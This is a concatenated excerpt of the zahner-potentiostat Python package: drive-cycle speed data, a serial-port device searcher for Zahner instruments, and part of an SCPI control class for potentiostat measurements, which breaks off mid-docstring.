509 1.87
510 0.71
511 0
512 0
513 0
514 0
515 0
516 0
517 0
518 0
519 0
520 0
521 0
522 0
523 0
524 0
525 0
526 0
527 0
528 0
529 0
530 0
531 0
532 0
533 0
534 0
535 0
536 0
537 0
538 0
539 0
540 0
541 0
542 0
543 0
544 2.36
545 3.94
546 5.31
547 8.26
548 9.42
549 11.15
550 12.73
551 14.78
552 16.05
553 17.41
554 19.72
555 21.52
556 23.35
557 24.83
558 25.99
559 27.15
560 28.31
561 29.46
562 30.62
563 31.78
564 32.94
565 34.18
566 36.25
567 37.41
568 38.56
569 39.72
570 40
571 40
572 40
573 40
574 40
575 40
576 40.82
577 41
578 41
579 41.3
580 42
581 42
582 42
583 42.93
584 43
585 43
586 43
587 43.56
588 44.71
589 45
590 44.97
591 44.18
592 44.66
593 44
594 44
595 44.81
596 45
597 45
598 45
599 45.44
600 46
601 46
602 46.92
603 47
604 47
605 47
606 47
607 47
608 47
609 47.04
610 49
611 49.33
612 49.51
613 49
614 49
615 49
616 49
617 48.72
618 48.87
619 50
620 50
621 50
622 50
623 49.78
624 49
625 49
626 49.69
627 50
628 50
629 50
630 49.68
631 49
632 49
633 48.2
634 48
635 48
636 48.27
637 49
638 49.58
639 50
640 50
641 50
642 50
643 50
644 50
645 50
646 50
647 50
648 50
649 50
650 50.47
651 51
652 51
653 51
654 51
655 51
656 51.42
657 52
658 52
659 52
660 52
661 52.2
662 53
663 53
664 53
665 53
666 53
667 53
668 53
669 53
670 52.38
671 52
672 52.93
673 52.91
674 52.25
675 53
676 53
677 53
678 53
679 53
680 53
681 53
682 53
683 53
684 53
685 53.98
686 55
687 55
688 55
689 55
690 55
691 55
692 55
693 55
694 55
695 55
696 55
697 55
698 55
699 55
700 55
701 54.5
702 54.66
703 55
704 54.03
705 54
706 54
707 54
708 54
709 54
710 54
711 54
712 54
713 54.77
714 56
715 56
716 56
717 56.02
718 57
719 56.67
720 56
721 56
722 56
723 56
724 56
725 56
726 56
727 56
728 56
729 56.91
730 57
731 57
732 57
733 57
734 57
735 57.85
736 58
737 58
738 58
739 58
740 58
741 58
742 58
743 58
744 58
745 57.15
746 56
747 56
748 56
749 56
750 56
751 55.63
752 55
753 55
754 55
755 55
756 55
757 55
758 55
759 55
760 54.22
761 54
762 54
763 54
764 54
765 54
766 54
767 54
768 54
769 54
770 54
771 54
772 54
773 54
774 53.01
775 50.86
776 49.7
777 48.54
778 47.39
779 46.23
780 45.07
781 43.91
782 42.51
783 40.6
784 39.44
785 38.28
786 37.13
787 35.94
788 33.81
789 32.66
790 30.5
791 28.34
792 26.37
793 25.03
794 21.87
795 19.85
796 16.56
797 15.4
798 14.24
799 12.17
800 10.71
801 6.08
802 2.61
803 1.45
804 0.3
805 0
806 0
807 0
808 0
809 0
810 0
811 0
812 0
813 0
814 0
815 0
816 0
817 0
818 0
819 0
820 0
821 0
822 0
823 0
824 0
825 0
826 0
827 0
828 0
829 0
830 0
831 0.19
832 1
833 1.51
834 2.66
835 4.64
836 6.96
837 8.86
838 7.71
839 7.45
840 9.22
841 10
842 9.08
843 10.08
844 11.24
845 12.79
846 14
847 12.58
848 12.87
849 13
850 13
851 13.68
852 15
853 15
854 13.37
855 12.03
856 12.26
857 14.29
858 14.56
859 15.2
860 16.76
861 17
862 17
863 17.23
864 18.77
865 20.54
866 19.6
867 18.14
868 17.98
869 17
870 16.34
871 15
872 15
873 15
874 15.96
875 12.35
876 15.28
877 14.27
878 12.59
879 12.25
880 9.28
881 8
882 8
883 8.38
884 9.53
885 10.69
886 11
887 9
888 9
889 9.32
890 10
891 9.36
892 9
893 9.95
894 14.33
895 17.53
896 19.42
897 20
898 20.74
899 21
900 21.11
901 23.84
902 27
903 27
904 29.05
905 32.52
906 31.01
907 31
908 31.62
909 33
910 32.37
911 30.43
912 30
913 30
914 30.51
915 32.41
916 33
917 32.27
918 32
919 31.04
920 32.2
921 33.36
922 34
923 34
924 34
925 33.01
926 31.86
927 30.1
928 26.17
929 23.39
930 21.46
931 17.28
932 15.83
933 13.76
934 12.6
935 10.33
936 8.28
937 5.38
938 2.91
939 0
940 0
941 0
942 0
943 0
944 0
945 0
946 0
947 0
948 0
949 0
950 0
951 0
952 0
953 0
954 0
955 0
956 0
957 0
958 0
959 0
960 0
961 0
962 0
963 0
964 0
965 0
966 0
967 0
968 0
969 0
970 0
971 0
972 0
973 0
974 0
975 0
976 0
977 0
978 0
979 0
980 0.51
981 0.33
982 0
983 0
984 0
985 0
986 0
987 0
988 0
989 0
990 0
991 0
992 0
993 0
994 0
995 0
996 0
997 0
998 0
999 0
1000 0
1001 0
1002 0
1003 0.13
1004 0.71
1005 0
1006 0
1007 0
1008 0
1009 4.15
1010 6
1011 6
1012 6
1013 5.3
1014 4.14
1015 1.96
1016 0
1017 0
1018 0
1019 0
1020 0
1021 0
1022 0
1023 0
1024 0
1025 0
1026 0
1027 0
1028 0
1029 0
1030 0
1031 0
1032 0
1033 0
1034 0
1035 0
1036 0
1037 0.48
1038 1.64
1039 0.41
1040 0
1041 0
1042 0
1043 0
1044 0
1045 0
1046 0
1047 0
1048 0
1049 0
1050 0
1051 0
1052 0
1053 0
1054 0
1055 0
1056 0
1057 0
1058 0
1059 0
1060 0""" | zahner-potentiostat | /zahner_potentiostat-1.1.0.tar.gz/zahner_potentiostat-1.1.0/zahner_potentiostat/drivecycle/HUDDSCOL.py | HUDDSCOL.py |
import glob
import sys
import time
from typing import Union, Tuple
from multiprocessing import Pool
from serial import Serial
import serial.tools.list_ports
from .serial_interface import (
SerialCommandInterface,
SerialDataInterface,
)
from .error import ZahnerConnectionError
class FoundDevices:
serialNumber: Union[str, None] = None
zahnerPort: dict[str, str] = dict()
hpPort: Union[str, None] = None
class SCPIDeviceSearcher:
"""Search for Zahner devices.
Each Zahner device provides two serial interfaces via USB.
The USB Product ID 0xA3AD is registered for Zahner.
With this class Zahner devices are searched and can be integrated more simply.
For example in the Windows device manager you can't see immediately which comports belong
to which device, because the numbers of the comports can change.
This class always returns the names of the serial interfaces with the corresponding methods.
"""
ZAHNER_SCPI_DEVICENAME = "ZAHNER-ELEKTRIK"
ZAHNER_VID = 0x0483
ZAHNER_PID = 0xA3AD
def __init__(self):
"""
Constructor
"""
self.commandInterface = None
self.dataInterface = None
def searchDevices(self) -> list[str]:
"""Search connected devices with IDN command.
It is NOT recommended to use this command, because it opens all serial ports of the computer
and speaks to the devices with the string \*IDN?, this could cause interference with the devices.
:returns: Returns a list with serial numbers of connected Zahner devices. The serial numbers are strings.
"""
devices = self.searchDevicesWithIDN(None)
return devices
def searchZahnerDevices(self) -> list[str]:
"""Search connected devices with Zahner PID and VID and IDN command.
This command should be used to search for Zahner devices.
Only Zahner devices are addressed for identification with this command.
:returns: Returns a list with serial numbers of connected Zahner devices. The serial numbers are strings.
"""
serialInterfacesWithZahnerVIDPID = self.searchSerialInterfacesWithZahnerVIDPID()
devices = self.searchDevicesWithIDN(serialInterfacesWithZahnerVIDPID)
return devices
def searchSerialInterfacesWithZahnerVIDPID(self) -> list[str]:
"""Search serial interfaces with Zahner PID and VID.
Checks the VID and PID of the serial interfaces, if it is a Zahner device.
:returns: List with serial interface names with Zahner PID and VID.
"""
ports = serial.tools.list_ports.comports()
portsWithZahnerDevices = []
for port in ports:
if (
port.vid == SCPIDeviceSearcher.ZAHNER_VID
and port.pid == SCPIDeviceSearcher.ZAHNER_PID
):
portsWithZahnerDevices.append(port.device)
return portsWithZahnerDevices
def _checkPorts(self, port: str) -> FoundDevices:
result = FoundDevices()
try:
connection = Serial(port=port, timeout=1, write_timeout=1)
writeTime = time.time()
connection.write(bytearray("*IDN?\n", "ASCII"))
while 1 > (time.time() - writeTime) and connection.inWaiting() == 0:
"""
Wait 1 second or until data has arrived.
"""
pass
if connection.inWaiting() == 0:
connection.close()
raise serial.SerialTimeoutException()
data = connection.read(1000)
data = data.decode("ASCII")
connection.close()
print(f"{port}: {data}")
string = data.split(",")
if len(data) > 3:
DeviceManufacturer = string[0].strip()
DeviceName = string[1].strip()
DeviceSerialNumber = string[2].strip()
DeviceSoftwareVersion = string[3].replace("binary", "").strip()
isBinary = False
if "binary" in data:
isBinary = True
if SCPIDeviceSearcher.ZAHNER_SCPI_DEVICENAME in DeviceManufacturer:
data = dict()
data["serial_name"] = port
data["manufacturer"] = DeviceManufacturer
data["name"] = DeviceName
data["serialnumber"] = DeviceSerialNumber
data["software_version"] = DeviceSoftwareVersion
data["binary"] = isBinary
result.zahnerPort = data
result.serialNumber = DeviceSerialNumber
elif "HEWLETT-PACKARD" in DeviceManufacturer:
"""
HP Multimeter is needed in-house, for calibration.
This can be seen as an example if other serial devices are
to be included in order to be able to find them.
"""
result.hpPort = port
else:
print(f"{port} error device answer: {data}")
except:
print("error: " + port)
return result
def searchDevicesWithIDN(self, ports: str = None) -> list[str]:
"""Search connected devices with IDN command.
Opens all serial interfaces and sends the string \*IDN? to the device and evaluates the response.
If a list of serial interfaces is passed for the ports parameter, only this list of ports is checked.
:param ports: List of serial interface names to be scanned.
:returns: Returns a list with serial numbers of connected Zahner devices. The serial numbers are strings.
"""
self.comportsWithHPDevice = []
self.comportsWithZahnerDevices = []
self.foundZahnerDevicesSerialNumbers = []
if ports == None:
ports = self._getAvailableSerialInterfaceNames()
print("Serial interfaces found: " + str(ports))
with Pool(max(4, len(ports))) as p:
results = p.map(self._checkPorts, ports)
for result in results:
if result.serialNumber != None:
if result.serialNumber not in self.foundZahnerDevicesSerialNumbers:
self.foundZahnerDevicesSerialNumbers.append(result.serialNumber)
self.comportsWithZahnerDevices.append(result.zahnerPort)
if result.hpPort != None:
self.comportsWithHPDevice.append(result.hpPort)
return self.foundZahnerDevicesSerialNumbers
def selectDevice(
self, serialNumber: Union[int, str, None] = None
) -> Tuple[SerialCommandInterface, SerialDataInterface]:
"""Select a found device.
This method selects a device by its serial number.
If no serial number is passed, then the first found device is selected.
The serial number must be specified as a string.
This function returns two values the command comport and the online live data comport.
If the respective comport is not found None is returned.
The data has to be read from the online channel, otherwise the measuring device hangs.
The online channel can also be used by other software like the Zahner-Lab to use it as a display.
:param serialNumber: The serial number of the device to select as `str` or `int` specify `None` to select the first device found.
:returns: Two strings commandInterface, dataInterface with the port names.
"""
self.commandInterface = None
self.dataInterface = None
if isinstance(serialNumber, int):
serialNumber = str(serialNumber)
if serialNumber == None:
"""
Use the first device if no serialnumber was set.
"""
if len(self.foundZahnerDevicesSerialNumbers) > 0:
serialNumber = self.foundZahnerDevicesSerialNumbers[0]
else:
raise ZahnerConnectionError("no device found") from None
"""
Search for the comports found in the previous one.
"""
for device in self.comportsWithZahnerDevices:
if serialNumber in device["serialnumber"] and device["binary"] == True:
self.dataInterface = device["serial_name"]
elif serialNumber in device["serialnumber"]:
self.commandInterface = device["serial_name"]
if self.commandInterface is None and self.dataInterface is None:
raise ZahnerConnectionError("device not found") from None
return self.commandInterface, self.dataInterface
def getCommandInterface(self) -> SerialCommandInterface:
"""Select a found command interface.
Returns the name of the serial interface. If no device was selected before, the first one is selected.
If no interface exists, None is returned.
:returns: Returns a string with the name of the serial interface. None if no command interface was found.
"""
if self.commandInterface == None and len(self.comportsWithZahnerDevices) > 0:
self.selectDevice()
return self.commandInterface
def getDataInterface(self) -> SerialDataInterface:
"""Select a found data interface.
Returns the name of the serial interface. If no device was selected before, the first one is selected.
If no interface exists, None is returned.
:returns: Returns a string with the name of the serial interface. None if no command interface was found.
"""
if self.commandInterface == None and len(self.comportsWithZahnerDevices) > 0:
self.selectDevice()
return self.dataInterface
def getMultimeterPort(self) -> Union[str, None]:
"""Returns the comport to which the multimeter is connected.
HP Multimeter is needed in-house, for calibration.
This can be seen as an example if other serial devices are
to be included in order to be able to find them.
:returns: The first comport with an HP device.
"""
if len(self.comportsWithHPDevice) > 0:
return self.comportsWithHPDevice.pop(0)
else:
return None
def _getAvailableSerialInterfaceNames(self) -> list[str]:
"""Detect the available serial interfaces.
This function determines the available serial interfaces independently of the platform.
:returns: A List with available comport names.
"""
if sys.platform.startswith("win"):
ports = ["COM%s" % (i + 1) for i in range(256)]
elif sys.platform.startswith("linux") or sys.platform.startswith("cygwin"):
# this excludes your current terminal "/dev/tty"
ports = glob.glob("/dev/tty[A-Za-z]+[A-Za-z0-9]*")
elif sys.platform.startswith("darwin"):
ports = glob.glob("/dev/tty.*")
else:
raise EnvironmentError("Unsupported platform")
def testFunc(port: str) -> Union[str, None]:
retval = None
try:
s = Serial(port=port, timeout=1, write_timeout=1)
s.close()
retval = port
except:
pass
return retval
with Pool(max(4, len(ports))) as p:
results = p.map(testFunc, ports)
return [i for i in results if i is not None] | zahner-potentiostat | /zahner_potentiostat-1.1.0.tar.gz/zahner_potentiostat-1.1.0/zahner_potentiostat/scpi_control/searcher.py | searcher.py |
from enum import Enum
from typing import Optional, Union
import time
import re
import datetime
import sys
import numpy
from .serial_interface import (
CommandType,
DEBUG,
SerialCommandInterface,
SerialDataInterface,
)
from .datareceiver import DataReceiver
from .error import ZahnerSCPIError
from builtins import isinstance
def firmwareStringToNumber(firmwareString):
softwareVersionRegex = re.compile(
"(?P<major>[\d]+).(?P<minor>[\d]+).(?P<build>[\d]+)(?P<additional>.*)"
)
softwareVersionMatch = softwareVersionRegex.match(firmwareString)
firmwareNumber = 0
firmwareNumber = firmwareNumber + 100000**2 * int(softwareVersionMatch["major"])
firmwareNumber = firmwareNumber + 100000**1 * int(softwareVersionMatch["minor"])
firmwareNumber = firmwareNumber + 100000**0 * int(softwareVersionMatch["build"])
return firmwareNumber
requiredSoftwareVersionString = "1.1.0"
requiredSoftwareVersion = firmwareStringToNumber(requiredSoftwareVersionString)
class COUPLING(Enum):
"""
Working modes for the potentiostat.
"""
GALVANOSTATIC = 0
POTENTIOSTATIC = 1
class RELATION(Enum):
"""
Possible potential references for voltage parameters.
OCP and OCV are the same and mean reference to open circuit voltage and potential respectively.
"""
ZERO = 0
OCV = 1
class SCPIDevice:
"""General important information for the control of the devices with this class.
The control concept is that via `SCPI <https://de.wikipedia.org/wiki/Standard_Commands_for_Programmable_Instruments>`_ with the setter methods parameters are set which configure
the primitives.
Under SCPI-COMMAND you can see the command sent by the method to the device.
The command must be followed by an "\\\\n" as a line break.
The following primitives are available to compose methods with:
**Potentiostatic or galvanostatic polarization**
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.measurePolarization`
**Open circuit voltage/potential scan**
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.measureOCV`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.measureOCVScan`
**Ramps potentiostatic or galvanostatic**
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.measureRampValueInTime`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.measureRampValueInScanRate`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.measureRampScanRateForTime`
**Staircase potentiostatic or galvanostatic**
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.measureIEStairs`
As an example, the following measurement methods were composed of the primitives:
**Charge or discharge something**
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.measureCharge`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.measureDischarge`
**Output potentiostatic or galvanostatic profile as potentiostatic and galvanostatic polarization or ramps**
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.measureProfile`
**PITT Potentiostatic Intermittent Titration Technique**
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.measurePITT`
**GITT Galvanostatic Intermittent Titration Technique**
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.measureGITT`
When the primitives are called, they use all parameters and then behave differently depending on
the configuration. The methods are setters for devices internal parameters for the individual
primitives which can be assembled. The parameters are not reset after the primitive and must be
changed manually if they are to change, for the next primitive.
**The concept is that nothing is done implicitly, everything must be done explicitly.
The only thing that is done implicitly is that the potentiostat is switched on by the methods
when they need a potentiostat switched on.**
The following methods/parameters are allowed by default:
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setAutorangingEnabled`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setInterpolationEnabled`
By default the following methods/parameters are disabled:
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMinMaxVoltageParameterCheckEnabled`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setMinMaxCurrentParameterCheckEnabled`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setGlobalVoltageCheckEnabled`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setGlobalCurrentCheckEnabled`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setToleranceBreakEnabled`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setGlobalVoltageCheckEnabled`
* :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.setChargeBreakEnabled`
The primitives turn the potentiostat on or off depending on how they need it.
They turn the potentiostat off or on after the primitive depending on how it was before.
After each primitive there is no measurement for a short time and the data is transferred to the
computer. This time depends on how the sampling rate is chosen, usually this time is in the
range of 0 ms to 100 ms, tending to be about 10 ms - 20 ms. In the future, primitives will
follow in which arbitrary signals with voltage or current values can be output without dead times.
If somewhere POGA is mentioned then the primitive :func:`~zahner_potentiostat.scpi_control.control.SCPIDevice.measurePolarization` is meant,
with which constant voltage or constant current can be output.
The binary serialName can be read from this object, or by other software such as the Zahner-Lab.
The data must always be read from the device when it sends them.
At the moment an autonomous measuring operation without connected computer is not possible.
When using multiple devices, these objects must each run in a separate thread.
It is not possible to pass these objects as argument for multiprocessing, because this object cannot be serialized.
:param commandInterface: SerialCommandInterface object to control the device.
:type commandInterface: :class:`~zahner_potentiostat.scpi_control.serial_interface.SerialCommandInterface`
:param dataInterface: SerialDataInterface object for online data.
:type dataInterface: :class:`~zahner_potentiostat.scpi_control.serial_interface.SerialDataInterface`
:param enablePackageUpdateWarning: False to disable warn output to the package version on the console.
"""
_commandInterface: SerialCommandInterface = None
_coupling: COUPLING = COUPLING.POTENTIOSTATIC
_raiseOnError: bool = False
_dataReceiver: Optional[DataReceiver] = None
def __init__(
self,
commandInterface: SerialCommandInterface,
dataInterface: Optional[SerialDataInterface],
enablePackageUpdateWarning: bool = True,
):
self._commandInterface = commandInterface
self._coupling = COUPLING.POTENTIOSTATIC
self._raiseOnError = False
if dataInterface is not None:
self._dataReceiver = DataReceiver(dataInterface)
"""
Read the device firmware version and check if the version matches the library.
"""
deviceInformation = self.IDN()
softwareVersionString = (
deviceInformation.split(",")[3].replace("binary", "").strip()
)
softwareVersionNumber = firmwareStringToNumber(softwareVersionString)
if softwareVersionNumber == requiredSoftwareVersion:
pass
elif softwareVersionNumber < requiredSoftwareVersion:
errorString = f"""ERROR: Device firmware must be updated.
The device firmware has the version {softwareVersionString}, but for this package the firmware version {requiredSoftwareVersionString} is needed.
Please carefully read the manual from the following link for updating the device firmware and properly follow the provided instructions:
https://download.zahner.de/ExternalPotentiostatUpdater/ZahnerPotentiostatUpdaterManual.pdf
From the following link you can download the installer for the latest device software:
https://download.zahner.de/ExternalPotentiostatUpdater/ZahnerPotentiostatUpdater_latest.exe
For any questions or in case of problems please contact: [email protected]
"""
print(errorString)
_ = input()
sys.exit()
elif (
softwareVersionNumber > requiredSoftwareVersion
and enablePackageUpdateWarning
):
warningString = f"""WARNING: There might be an update available for the Python package.
The Python package was installed for the devices firmware {requiredSoftwareVersionString}, but the found device has the firmware version {softwareVersionString}.
So it could be possible that an update for the Python package is available.
Check GitHub or pip for updates:
https://github.com/Zahner-elektrik/zahner_potentiostat
pip install zahner-potentiostat -U
"""
print(warningString)
return
"""
Methods for managing the object and the connection.
"""
def close(self) -> None:
"""Close the Connection.
Close the connection and stop the receiver.
"""
self._commandInterface.close()
if self._dataReceiver != None:
self._dataReceiver.stop()
def getDataReceiver(self) -> DataReceiver:
"""Get the DataReceiver object.
The DataReceiver type object processes the data from the binary comport.
:returns: the DataReceiver object or None if it doesn't exist.
"""
return self._dataReceiver
def setRaiseOnErrorEnabled(self, enabled: bool = True) -> None:
"""Setting the error handling of the control object.
If False, then strings from the device containing error are thrown as exceptions.
:param enabled: True to throw execeptions on errors.
"""
self._raiseOnError = enabled
return
def getRaiseOnErrorEnabled(self) -> bool:
"""Read the error handling of the control object.
:returns: True if errors trigger an exception.
"""
return self._raiseOnError
"""
Methods that talk to the device via SCPI.
"""
def IDN(self) -> str:
"""Read informations about the device.
The device uses the `SCPI <https://de.wikipedia.org/wiki/Standard_Commands_for_Programmable_Instruments>`_ protocol on the interface.
This method provides for example the following software information.
Manufacturer, device name, serial number, software version and "binary" if it is the binary channel.
For example:
ZAHNER-ELEKTRIK,PP212,33000,1.0.0 binary
:SCPI-COMMAND: \*IDN?
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine("*IDN?")
def readDeviceInformations(self) -> str:
"""Read informations about the device.
The device uses the `SCPI <https://de.wikipedia.org/wiki/Standard_Commands_for_Programmable_Instruments>`_ protocol on the interface.
This method provides for example the following software information.
Manufacturer, device name, serial number, software version and "binary" if it is the binary channel.
For example:
ZAHNER-ELEKTRIK,PP212,33000,1.0.0 binary
The information is then transferred to the internal data structure.
:SCPI-COMMAND: \*IDN?
:returns: The response string from the device.
:rtype: string
"""
reply = self.IDN()
reply = reply.split(",")
reply[0] = reply[0].strip()
self.DeviceName = reply[1].strip()
self.DeviceSerialNumber = reply[2].strip()
self.DeviceSoftwareVersion = reply[3].strip()
self.DiagnosticState = 0
return self.IDN()
def clearState(self) -> str:
"""Clear device state.
Deleting the device state, for example, if the Global Limits have been exceeded.
The error numbers are described in the class :class:`~zahner_potentiostat.scpi_control.error.ZahnerSCPIError`.
:SCPI-COMMAND: \*CLS
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine("*CLS")
def readState(self) -> str:
"""Read device state.
Read the device state, for example, if the Global Limits have been exceeded.
The error numbers are described in the class :class:`~zahner_potentiostat.scpi_control.error.ZahnerSCPIError`.
:SCPI-COMMAND: \*CLS?
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine("*CLS?")
def checkResetStatus(self) -> str:
"""Check device status.
Read and clear the status if an error has occurred.
:returns: The response string from the device.
:rtype: string
"""
status = self.readState()
if status != 0:
self.clearState()
print("Error Status: " + str(status))
return status
def resetCommand(self) -> str:
"""Reset the device.
**THIS FUNCTION CAN BE CALLED FROM AN OTHER THREAD**
This command switches off the potentiostat and reboots the device.
This causes the connection to be lost and the connection must be re-established.
This object must also be recreated so that everything is reinitialized via the
constructors and the threads are restarted.
:SCPI-COMMAND: \*RST
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine("*RST")
def abortCommand(self) -> str:
"""Abort of the active measurement.
**THIS FUNCTION CAN BE CALLED FROM AN OTHER THREAD**
This function aborts the measurement and switches off the potetiosat.
Afterwards the status must be reset with CLS so that the measurement can be continued and
new primitives can be called.
The device responds to reply with ok. Other command that are active for example an ramp will
return with an status that the measurement was aborted. It is also possible that the device
will return with two ok if, depending on when the active measurement was finished.
:SCPI-COMMAND: ABOR
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine("ABOR")
def calibrateOffsets(self) -> str:
"""Execute the offset calibration.
The offsets must be calibrated manually by calling this method after the instrument has been
warmed up for at least half an hour.
The calibration data contains the warm offset values at the time of calibration.
If the cold instrument is calibrated, the offsets will be worse when the instrument is warm.
If you do not calibrate after the start, the offsets will be getting better until the instrument is warmed up.
It is NOT recommended to calibrate the cold instrument only once after startup.
It does not hurt to calibrate the offsets from time to time, as this only takes a few seconds.
If the calibration returns several times with an error, there may be a defect.
In this case, contact your Zahner distributor.
:SCPI-COMMAND: :SESO:CALO
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(":SESO:CALO")
def switchToEPCControl(self) -> str:
"""Switch to EPC mode and switch off the potentiostat for safety.
When this command is called, the device closes the USB connection and can only be controlled via the EPC interface.
It must be switched back to the SCPI mode manually via Remote2 from the Thales side.
This function probably throws an exception, because the device disconnects from USB by software.
This must be received with Try and Catch.
:SCPI-COMMAND: :SYST:SEPC
:returns: The response string from the device.
:rtype: string
"""
if self._dataReceiver != None:
self._dataReceiver.stop()
return self._writeCommandToInterfaceAndReadLine(":SYST:SEPC")
def switchToEPCControlWithoutPotentiostatStateChange(self) -> str:
"""Switch to EPC mode without changing settings on the potentiostat.
This function leaves the potentiostat in its current operating state and then switches to EPC mode.
This should only be used when it is really necessary to leave the potentiostat on,
because between the change of control no quantities like current and voltage are monitored.
When this command is called, the device closes the USB connection and can only be controlled via the EPC interface.
It must be switched back to the SCPI mode manually via Remote2 from the Thales side.
This function probably throws an exception, because the device disconnects from USB by software.
This must be received with try and catch.
To ensure that the switch between Thales and Python/SCPI is interference-free, the following procedure should be followed.
This is necessary to ensure that both Thales and Python/SCPI have calibrated offsets, otherwise jumps may occur when switching modes:
1. Connect Zennium with USB and EPC-device/power potentiostat (XPOT2, PP2x2, EL1002) with USB to the computer. As well as Zennium to power potentiostat by EPC cable.
2. Switch on all devices.
3. Allow the equipment to warm up for at least 30 minutes.
4. Select and calibrate the EPC-device in Thales (with Remote2).
5. Switching the EPC-device to SCPI mode via Remote2 command.
6. Performing the offset calibration with Python/SCPI.
7. Then it is possible to switch between Thales and Python/SCPI with the potentiostat switched on.
:SCPI-COMMAND: :SYST:HOTS
:returns: The response string from the device.
:rtype: string
"""
if self._dataReceiver != None:
self._dataReceiver.stop()
return self._writeCommandToInterfaceAndReadLine(":SYST:HOTS")
def setLineFrequency(self, frequency: float) -> str:
"""Set the line frequency of the device.
With this command the line frequency can be changed, depending on the country where the
device is located.
The line frequency is stored in the device and is still stored after a restart of the device.
The device must know the line frequency of the country in which it is located in order to
suppress interference.
:SCPI-COMMAND: :SYST:LINF <value>
:param frequency: The frequency as float value.
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(
":SYST:LINF {}".format(frequency)
)
def getLineFrequency(self) -> float:
"""Read the line frequency of the device.
The line frequency is stored in the device and is still stored after a restart of the device.
:SCPI-COMMAND: :SYST:LINF?
:returns: The set line frequency as float.
:rtype: float
"""
return self._writeCommandToInterfaceAndReadValue(":SYST:LINF?")
def setDateTime(
self, year: int, month: int, day: int, hour: int, minute: int, second: int
) -> str:
"""Set the time of the device.
This command is used to set the device time.
:SCPI-COMMAND: :SYST:TIME <yyyy>-<mm>-<dd>T<hh>:<mm>:<ss>
:returns: The response string from the device.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(
":SYST:TIME {:04d}-{:02d}-{:02d}T{:02d}:{:02d}:{:02d}".format(
year, month, day, hour, minute, second
)
)
def __get_date_time_str_as_iso_8601__(self) -> str:
"""read the time of the device
:SCPI-COMMAND: :SYST:TIME?
:returns: the time from the device as ISO 8601 string
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(":SYST:TIME?")
def getDateTime(self) -> str:
"""read the time of the device
:returns: the time from the device as ISO 8601 string
"""
return self.__get_date_time_str_as_iso_8601__()
def getDateTimeStruct(self) -> datetime.date:
"""
read the time of the device
:returns the date and time as `datetime` struct
"""
return datetime.datetime.fromisoformat(self.__get_date_time_str_as_iso_8601__())
def getSoftwareInfo(self) -> str:
"""Read software information.
The basic revision of the software can be queried with IDN.
This command queries complex software information that is not required under normal circumstances.
It is only used internally to identify untagged versions of the software.
For example:
Version: 1.0.0-rc3; Branch: master; Hash: 247a16a75a3d5685def55972588990aeebbf280f; Target: Debug; Compile time: 2021-04-08T10:49:25.074486+01:00
:SCPI-COMMAND: :SYST:SOFT:INFO?
:returns: The time from the device as ISO 8601 string.
:rtype: string
"""
return self._writeCommandToInterfaceAndReadLine(":SYST:SOFT:INFO?")
def getPotential(self) -> float:
"""Read the potential from the device.
This command is the same as getVoltage to allow the naming of voltage and potential.
:SCPI-COMMAND: :MEAS:VOLT?
:returns: The most recent measured potential.
:rtype: float
"""
return self.getVoltage()
def getVoltage(self) -> float:
"""Read the voltage from the device.
Read the voltage between Reference and Working Sense.
:SCPI-COMMAND: :MEAS:VOLT?
:returns: The most recent measured voltage.
:rtype: float
"""
line = self._writeCommandToInterfaceAndReadLine(":MEAS:VOLT?")
text = line.split(",")
return float(text[0])
def getPotentialMedian(self, measurements: int = 7) -> float:
"""Read potential and calculate median.
Does the same as getVoltageMedian.
:param measurements: The number of measurements for median calculation.
:returns: The median potential.
:rtype: float
"""
return self.getVoltageMedian(measurements)
def getVoltageMedian(self, measurements: int = 7) -> float:
"""Read potential and calculate median.
Reade measurements times the potential from the device and calculate the
median.
:param measurements: The number of measurements for median calculation.
:returns: The median potential.
:rtype: float
"""
data = []
for i in range(measurements):
time.sleep(0.050)
data.append(self.getVoltage())
data = sorted(data)
return numpy.median(data)
def getCurrent(self) -> float:
"""Read the current from the device.
This command reads only the current current value.
This function does NOT automatically set the correct current range, it ONLY READS.
:SCPI-COMMAND: :MEAS:CURR?
:returns: The most recent measured current.
:rtype: float
"""
return self._writeCommandToInterfaceAndReadValue(":MEAS:CURR?")
def getCurrentMedian(self, measurements: int = 7) -> float:
"""Read current and calculate median.
Reade measurements times the current from the device and calculate the
median.
:param measurements: The number of measurements for median calculation.
:returns: The median current.
:rtype: float
"""
data = []
for i in range(measurements):
time.sleep(0.050)
data.append(self.getCurrent())
data = sorted(data)
return numpy.median(data)
def setPotentiostatEnabled(self, enable: bool = False) -> str:
"""Switching the potentiostat on or off.
If only the potentiostat is switched on, **NO RANGING** is performed and **NO LIMITS** are monitored.
Everything must be done manually.
If primitives require a potentiostat to be on, such as polarizing, then they will turn the
